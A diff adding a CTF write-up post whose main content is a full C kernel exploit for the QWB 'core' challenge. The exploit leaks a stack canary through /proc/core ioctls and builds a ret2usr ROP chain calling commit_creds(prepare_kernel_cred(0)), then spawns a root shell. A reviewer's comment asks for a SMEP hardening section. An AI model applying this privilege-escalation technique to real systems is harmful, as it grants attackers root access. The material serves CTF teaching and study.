_posts/2022-07-11-ret2usr-强网杯CTF-core.md

```diff
@@ -0,0 +1,178 @@
+
+```c
+ 102   │     for(i = 0; i < 10; i++)
+ 103   │     {
+ 104   │         rop[i] = canary;
+ 105   │     }
+ 106   │     rop[i++] = (size_t)Getroot;
+ 107   │     rop[i++] = swapgs;
+ 108   │     rop[i++] = 0;
+```
+
+exp:
+
+```c
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#define CORE_READ 0x6677889B
+#define CORE_OFF 0x6677889C
+#define CORE_COPY 0x6677889A
+
+size_t vmlinux_base,commit_creds_addr,prepare_kernel_cred_addr;
+size_t user_cs,user_ss,user_sp,user_rflags;
+size_t raw_vmlinux_base = 0xffffffff81000000;
+
+void save_status()
+{
+	__asm__(
+		"mov user_cs, cs;"
+		"mov user_ss, ss;"
+		"mov user_sp, rsp;"
+		"pushf;"
+		"pop user_rflags"
+	);
+}
+
+void GetShell() {
+    if (!getuid()) {
+        system("/bin/sh");
+    }
+    else {
+        puts("[-] CAN NOT GETSHELL.");
+        exit(1);
+    }
+}
+
+int find_symbols()
+{
+	char *ptr;
+	char buf[0x40];
+	FILE* fd = fopen("/tmp/kallsyms","r");
+	if(!fd)
+	{
+		printf("[-] Open /tmp/kallsyms ERROR.\n");
+		return 0;
+	}
+	while(fgets(buf,sizeof(buf),fd))
+	{
+		if(commit_creds_addr && prepare_kernel_cred_addr)
+			return 1;
+		if (strstr(buf, "commit_creds")) 
+		{
+            commit_creds_addr = strtoull(buf, &ptr, 16);
+			printf("[+] Find: commit_creds: 0x%llx\n",commit_creds_addr);
+        }
+        if (strstr(buf, "prepare_kernel_cred")) 
+		{
+            prepare_kernel_cred_addr = strtoull(buf, &ptr, 16);
+			printf("[+] Find: prepare_kernel_cred: 0x%llx\n",prepare_kernel_cred_addr);
+        }
+	}
+	return 0;
+}
+
+void Getroot()
+{
+	char* (*pkc)(int) = prepare_kernel_cred_addr;
+	void (*cc)(char*) = commit_creds_addr;
+	(*cc)((*pkc)(0));
+}
+
+int main()
+{
+    save_status();
+	int f=find_symbols();
+	if(!f)
+	{
+		printf("[-]Find Symbols ERROR.\n");
+		exit(0);
+	}
+	
+	vmlinux_base = commit_creds_addr - 0x9c8e0;
+	size_t offset = vmlinux_base - raw_vmlinux_base;
+	size_t swapgs = 0xffffffff81a012da + offset;	//swapgs; popfq; ret;
+	size_t iretq = 0xffffffff81050ac2 + offset;     //iretq; ret;
+	size_t rop[0x100];
+	char user_buf[0x40] = {0};
+    int i;
+
+	int fd = open("/proc/core", O_RDWR);
+    if (!fd) {
+        puts("[-] OPEN /proc/core ERROR.");
+        exit(0);
+    }
+	ioctl(fd, CORE_OFF, 0x40);
+    ioctl(fd, CORE_READ, user_buf);  //leak canary
+	size_t canary = ((size_t *)user_buf)[0];
+    printf("[+] Find canary: 0x%llx\n", canary);
+
+    for(i = 0; i < 10; i++)
+    {
+        rop[i] = canary;
+    }
+	rop[i++] = (size_t)Getroot;
+	rop[i++] = swapgs;
+	rop[i++] = 0;
+	rop[i++] = iretq;
+    rop[i++] = (size_t)GetShell;
+    rop[i++] = user_cs;
+    rop[i++] = user_rflags;
+    rop[i++] = user_sp;
+    rop[i++] = user_ss;
+	
+	write(fd, rop, sizeof(rop));
+	ioctl(fd, CORE_COPY, 0xffffffffffff0000|0x100);
+	return 0;
+}
+```
+
```

Comment:
SMEP can prevent such a ret2usr attack. Add a new section to talk about "Prevention or Hardening"

Reply:
ok